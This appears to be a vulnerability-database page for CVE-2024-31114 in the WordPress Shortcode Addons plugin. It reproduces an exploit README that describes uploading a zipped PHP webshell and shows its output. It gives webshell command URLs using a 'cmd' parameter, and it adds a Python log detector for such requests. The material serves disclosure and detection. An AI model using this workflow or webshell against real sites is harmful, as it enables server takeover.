POC details: 1c7573d2eaa001a3272ea1e5512608a44094aa45

Source
Related vulnerability
Title: WordPress Plugin Shortcode Addons code issue vulnerability (CVE-2024-31114)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets users host a personal blog on a server running PHP and MySQL; a WordPress plugin is an add-on application for it. The WordPress plugin Shortcode Addons has a code issue vulnerability caused by the unrestricted upload of files of a dangerous type.
Description
Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
Introduction
# CVE-2024-31114 - WordPress Shortcode Addons RCE Exploit

**Shortcode Addons <= 3.2.5 – Authenticated (Admin+) Arbitrary File Upload**  
**CVE ID:** CVE-2024-31114  
**CVSS Score:** 9.1 (Critical)  

---

## 🛠️ Vulnerability Description

The **Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension** plugin for WordPress is vulnerable to arbitrary file uploads due to **missing file type validation** in all versions **up to and including 3.2.5**.

This flaw allows **authenticated attackers with administrator-level access or higher** to upload arbitrary files to the server — which can lead to **Remote Code Execution (RCE).**

---

## 🚀 Script Description

This Python script automates exploitation of the vulnerability. It performs:

1. Disabling SSL verification
2. Logging in with given credentials
3. Extracting the CSRF token (`_wpnonce`)
4. Generating a PHP shell (`nxploit.php`)
5. Compressing and uploading it as a `.zip`
6. Confirming the upload and accessing the shell
7. Executing `whoami` on the target server

---

## 🧪 Usage

```bash
usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD

Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target URL (e.g. http://target.com)
  -un, --username USERNAME   WordPress Admin Username
  -p, --password PASSWORD    WordPress Admin Password
```

---

## 📤 Example Output

```
[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.
```

---

## 🐚 Web Shell Usage

Once the payload is uploaded, you can execute system commands using the following format:

```
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command
```

🔹 Example:

```
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
```

This will list the contents of the current directory on the server.
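From the defender's side, the request pattern above leaves a clear trace in web-server access logs: PHP should never execute from `wp-content/uploads`, and a `cmd=` query against a script there is a strong webshell indicator. The following Python detector is an added example, not part of the PoC repository; the log lines are constructed and the parameter list is an assumption about common webshell naming.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:12:00:01 +0000] "POST /wp-admin/admin.php?page=shortcode-addons HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.5 - - [10/May/2024:12:00:02 +0000] "GET /wp-content/uploads/shortcode-addons/nxploit.php?cmd=whoami HTTP/1.1" 200 43 "-" "python-requests/2.31"
198.51.100.7 - - [10/May/2024:12:00:03 +0000] "GET /wp-content/uploads/2024/05/photo.jpg HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2024:12:00:04 +0000] "GET /wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls HTTP/1.1" 200 120 "-" "python-requests/2.31"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Server-side script extensions that should never be served from the uploads tree.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Query parameter names typical of command-execution webshells (assumed list; includes the PoC's `cmd`).
SUSPICIOUS_PARAMS = {"cmd", "exec", "command"}


def analyse_line(line):
    """Return a finding dict if the request looks like webshell use under uploads, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.startswith("/wp-content/uploads/") or not SCRIPT_EXT.search(url.path):
        return None
    params = parse_qs(url.query)
    reasons = ["script request under wp-content/uploads"]
    hits = sorted(SUSPICIOUS_PARAMS.intersection(params))
    if hits:
        reasons.append("command-style parameter(s): " + ", ".join(hits))
    if m.group("status") == "200":
        reasons.append("status 200: the script executed instead of being blocked")
    return {"ip": m.group("ip"), "time": m.group("ts"), "path": url.path,
            "status": int(m.group("status")), "reasons": reasons}


def scan_log(text):
    """Run analyse_line over every line of an access log and collect the findings."""
    return [f for f in (analyse_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[!] {f['ip']} {f['time']} {f['path']} ({f['status']}): " + "; ".join(f["reasons"]))
```

Denying execution of `.php` under `wp-content/uploads` at the web server turns these 200s into 403s, which is also the cheapest mitigation while the plugin is unpatched.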


## ⚠️ Disclaimer

This tool is for **educational and authorized testing purposes only**.  
The author is **not responsible** for any misuse or damage caused by this script.

Use responsibly and only on systems you have explicit permission to test.

---
**By:** Nxploited | Khaled Alenazi  


File snapshot

[4.0K] /data/pocs/1c7573d2eaa001a3272ea1e5512608a44094aa45
├── [4.3K] CVE-2024-31114.py
├── [1.1K] LICENSE
└── [2.5K] README.md
0 directories, 3 files